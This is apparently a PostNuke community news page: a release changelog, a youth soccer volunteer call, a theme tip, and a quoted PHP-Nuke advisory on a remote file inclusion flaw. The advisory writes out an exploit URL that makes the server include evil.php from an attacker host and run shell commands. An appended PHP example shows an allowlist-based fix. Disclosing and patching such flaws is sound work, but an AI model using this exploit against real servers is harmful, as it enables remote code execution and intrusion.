News
I used a slightly changed BLEUCHROME theme and made some of my own modules for administration in our eCommunity.
The release process has been changed for .71 and subsequent releases to ensure better quality, and less frustration for you and us.
In the meantime, these are the fixes and changes that were incorporated in .703:
CHANGES
- changed security.php to return an array (Jim McDonald)
- ran Generate Modules (Webmaster)
- added some of the missing translations (me)
- replaced pn64.php with a newer version (Jim McDonald)
- updated version number in default message (Soren Grauslund)
- applied the newest pnRedirect code (me)
- removed superfluous table from dl-adddownload (Anonymous)
- added missing eng directories (Steven Feather)
- Fixed redirects in Recommend Us (Eugenio Baldi)
- Fixed Registration login (Bob Brown)
- Fixed some & in Poll comments (me)
- Generically fixed & in redirects (whyzzi)
- added missing to login (Peter Nelson)
- added missing to permissions (Michael Jansen)
- Fixed automated news (Jan Schrage)
- Fixed file include vulnerability (Jim McDonald)
- Fixed permission string for web links (Fred B)
- Fixed in Recommend Us (Andy Varganov)
- Fixed Referers
- Fixed Downloads
- Fixed Links Admin
- Fixed Banners Admin
- Deployed CSRF Exploit Fix (Jim McDonald, adam_baum)
Enjoy!
Our section here in Hawaii is hosting the AYSO (American Youth Soccer Organization) National Games this summer in Honolulu July 8-14.
We want to do everything we can to make this site as live a site as we can for the week so the 650,000+ kids and 180,000+ volunteers not attending can keep abreast of the tournament.
We want to post the scores of the 160 or so games played every day as soon as they are finished from the admin tent. We want to set up referee assignments on the site weeks or months in advance by allowing them to register & pick game assignments. We want to do whatever we or you can think of that can be done live and in advance of the tournament.
Some of the present modules will work great with minor changes but it's going to require one or more new modules to do what we want to do.
We are asking for volunteers who want to help with this project in designing modules and to do a Hawaiian style soccer theme around our logo. You can contact me at billt@haii.net and we can talk about what we want to do.
Mahalo Bill
Just for your info, if you are looking to multisite with themes for the different sites, be sure to update all the links on the images for the themes. As stupid as it seems, this one had me going for a little while. They did mention in the docs about putting in the extra link for the logo.gif but not about the themes. So where your theme used to have a link like:
img src="themes/$thename/images/topleft.gif" border=0 width=622 height=109 alt=""
You should replace all image tags like this:
img src="".WHERE_IS_PERSO."themes/$thename/images/topleft.gif" border=0 width=622 height=109 alt=""
There is also one minor adjustment to the whoisinc.php which made life a little easier. You have to add a . to the www servername, i.e.
$serverName = str_replace("www.","",$serverName);
So if you're looking for help just contact me
Lee
lesmith@eurobell.co.uk
Is there a shared user database between all these sites? I personally do not think so, but why there is not one is a better question.
All the themes are different (which I do not mind) but the links are all different and they are not organized at all. I think all the subdomains need some cleaning up when it comes to links, themes, and the user tables overall. Each one has its own sourceforge project and needs to be linked to that site.
I have to say I love PostNuke and the dev team, I am just shooting a question to the admins of the site.
This is a modularization of the original site: http://www.SkiWhere.com with the goal of taking reviews for each ski resort. Of course we have bigger plans. We have a similar site at: http://www.ChurchZip.com
Subject: PHP-Nuke allows Command Execution & Much more
Hi All!
I've found a serious security flaw in PHP-Nuke.
It allows a user to execute any PHP code.
The flaw is in the index.php's include file feature.
It allows including files like index.php?file=file
It prevents users including ..'s in URL's, but
it didn't prevent users from entering http://-urls
Remember the PHP's remote get feature...
How to exploit:
Upload this file to some free web space provider or
set up your own server:
Then just requesting http://insecure-server/index.php?file=http://where.the.bad.php.file.is/evil.php&cmd=ls%20-al
will execute ls -al command.
I will not upload the file anywhere to prevent too easy exploiting. (No script kiddies)
Vendor status:
I contacted the author on 28.12.2001 and he hasn't
replied.
Sincerely
"Nopman"
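The advisory above describes a filter on the `file` parameter that rejects `..` but lets `http://` values through. As an added example (not code from PHP-Nuke, PostNuke or the advisory's author), the following compares that kind of filter with an allowlist-based resolver; the function names, the allowlist and the temporary pages directory are assumptions made for the illustration.

```php
<?php
// Added example, not PHP-Nuke or PostNuke code. The allowlist and the
// pages directory are hypothetical names chosen for this illustration.

// The filter the advisory describes: only ".." is rejected, so a value
// that carries a URL scheme still passes.
function weak_check(string $file): bool
{
    return strpos($file, '..') === false;
}

// Hardened: the request value is only a key into a fixed allowlist.
function resolve_include(string $file, array $allowed, string $baseDir): ?string
{
    // Plain names only: no scheme, slash, dot or NUL byte can match.
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $file)) {
        return null;
    }
    if (!in_array($file, $allowed, true)) {
        return null;
    }
    // realpath() returns false for a missing file; also confirm the
    // resolved path is still inside the base directory.
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $file . '.php');
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// Constructed demo data: a temporary pages directory with one page.
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'pages_demo_' . getmypid();
mkdir($dir);
file_put_contents($dir . DIRECTORY_SEPARATOR . 'news.php', "<?php // constructed\n");

$samples = ['news', 'admin', '../config', 'http://remote.example/page.php'];
foreach ($samples as $s) {
    printf("%-32s weak=%-5s hardened=%s\n", $s,
        weak_check($s) ? 'pass' : 'block',
        resolve_include($s, ['news', 'downloads'], $dir) === null ? 'block' : 'allow');
}

unlink($dir . DIRECTORY_SEPARATOR . 'news.php');
rmdir($dir);
```

Keeping `allow_url_include` set to Off in php.ini (its default) is a second layer that stops `include` from fetching remote URLs even if a filter is bypassed.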